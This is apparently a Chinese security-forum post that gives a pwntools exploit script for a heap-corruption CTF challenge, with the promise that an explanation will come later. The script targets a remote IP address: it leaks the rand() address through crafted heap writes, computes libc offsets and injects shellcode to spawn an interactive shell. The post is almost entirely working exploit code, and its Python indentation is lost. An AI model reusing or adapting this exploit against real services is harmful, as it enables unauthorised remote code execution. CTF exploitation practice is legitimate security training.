先贴exploit脚本，思路后边补上

from pwn import *
import time
import re

libcbase = 0;

context.log_level = 'debug'
#t = process('./pwn')
t = remote('123.206.22.95',8888)


def CreateItemChunk():#chunk size 0x50
brk = 1;
while(brk):
t.sendline("4")
while(1):
string = t.recvline()
if(string.find("pick up") != -1):
t.sendline("y")
brk = 0;
break

if(string.find("nothing found") != -1):
break


time.sleep(1)
#elif(string.find("nothing found") != -1 ):


def DelItemChunk(n):
t.sendline("2")
t.recvuntil("Your Choice:")
t.sendline(str(n))
t.recvuntil("2.return")
t.sendline('1')
t.recvuntil("2.return")
t.sendline('1')


def GetRandAddr():#chunk size 0x50
while(1):
#print "fuck"
string = t.recvline()
print string
if(string.find("No.2 error * ") != -1):
ls = re.split(" |\n",string)
#echo string
print ls[3]
return int(ls[3])
if(string.find("Your Choice:") != -1):
return 0


t.recvuntil("==============================")
t.sendline('2')
t.recvuntil("username")
t.sendline("xiaohang1")
t.recvuntil("password")
t.sendline(p64(0x605048))
t.recvuntil("character's name")
t.sendline("chickendinner")
t.recvuntil("==============================")
t.sendline('1')
t.recvuntil("username:")
t.sendline("xiaohang1")
t.recvuntil("password:")
t.sendline(p64(0x605048))
t.recvuntil("0.exit")
t.sendline("5")
t.recvuntil("name:")
t.sendline("ShowMeTheMoney")
t.recvuntil("content:")
t.sendline("a"*0x10)
t.recvuntil("0.exit")



t.sendline("3") #select base
t.sendline("1")
t.recvuntil("0.exit")


CreateItemChunk()

t.recvuntil("0.exit")
t.sendline("5")
t.recvuntil("content:")
t.sendline("a"*0x20 + p64(1) + p64(0x40) + p64(1) + p64(0x28) + p64(1) + p64(0x0605078))
t.recvuntil("0.exit")
t.sendline("2") # show rand() address
#string = t.recvuntil("Your Choice:")
#index = string.find("No.2 error * ")
randAddr = GetRandAddr()
if(randAddr == 0):
print "can't get rand() address"
t.interactive()
print ("rand address : %x\n"%randAddr)

t.sendline("9")
t.recvuntil("0.exit")


t.sendline("5")
t.recvuntil("content:")
t.sendline("a"*0x20 + p64(1) + p64(0x40) + p64(1) + p64(0x28) + p64(1) + p64(0x0605080))
t.recvuntil("0.exit")

DelItemChunk(1)
t.recvuntil("0.exit")


i = 59
while (i) :
CreateItemChunk()
time.sleep(1)
DelItemChunk(2)
i -= 1

'''
asmstr = asm(shellcraft.amd64.mov('rbx', randAddr),arch = 'amd64', os = 'linux')
asmstr += asm(shellcraft.amd64.mov('rax', 0x694c204320554e47),arch = 'amd64', os = 'linux')
asmstr += asm("cmp rax,[rbx]",arch = 'amd64', os = 'linux')
asmstr += "\x74\x05"
asmstr += asm("inc rbx",arch = 'amd64', os = 'linux')
asmstr += "\x75\xf6"
asmstr += asm("mov rdi,rbx",arch = 'amd64', os = 'linux')
asmstr += asm("call [0x0605018]",arch = 'amd64', os = 'linux') # put
asmstr += asm("mov rsi,rbx",arch = 'amd64', os = 'linux')
asmstr += asm("mov rdi , 0x0403618",arch = 'amd64', os = 'linux')
asmstr += asm("mov rax , 0",arch = 'amd64', os = 'linux')
asmstr += asm("call [0x0605038]",arch = 'amd64', os = 'linux') # print

asmstr += asm("add rsp, 0x98",arch = 'amd64', os = 'linux')
asmstr += asm("pop rbp",arch = 'amd64', os = 'linux')
asmstr += asm("ret",arch = 'amd64', os = 'linux')


t.sendline("5")
t.recvuntil("content:")
t.sendline("a"*0x70 + asmstr)
t.recvuntil("0.exit")
'''
#shellcraft.amd64.mov('rbx', 0x694c204320554e47).rstrip()
#t.interactive()

asmstr = asm(shellcraft.amd64.mov('rbx', randAddr),arch = 'amd64', os = 'linux')
asmstr += asm("mov rdi , rbx",arch = 'amd64', os = 'linux')
asmstr += asm("add rdi , 0x151DB7",arch = 'amd64', os = 'linux')
asmstr += asm("add rbx , 0xA430",arch = 'amd64', os = 'linux')
asmstr += asm("call rbx",arch = 'amd64', os = 'linux')
t.sendline("5")
t.recvuntil("content:")
t.sendline("a"*0x70 + asmstr)
t.recvuntil("0.exit")
t.interactive()

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课